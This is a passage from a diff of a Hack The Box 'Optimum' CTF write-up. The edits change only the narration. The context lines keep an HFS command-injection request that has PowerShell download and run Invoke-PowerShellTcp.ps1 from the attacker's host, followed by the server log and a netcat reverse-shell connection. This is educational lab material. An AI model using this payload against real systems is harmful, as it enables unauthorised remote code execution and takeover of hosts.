pencer-io/pencer-io.github.io/_posts/2020-06-29-ctf-htb-optimum.md

 /?search=%00{.exec|c%3a\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).downloadString('http%3a//10.10.14.22%3a8000/Invoke-PowerShellTcp.ps1').} HTTP/1.1
 ```

-Now press Go on Burp then switch to HTTP server, should have a connection:
+Now press Go on Burp, then switch to my HTTP server, where we should have a connection:

 ```text
 10.10.10.8 - - [23/Jul/2019 22:39:30] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
 ```

-Switch to nc and should have a shell connected:
+That worked, so switch to my waiting NC listener and we should have a shell connected:

 ```text
 connect to [10.10.14.22] from (UNKNOWN) [10.10.10.8] 49162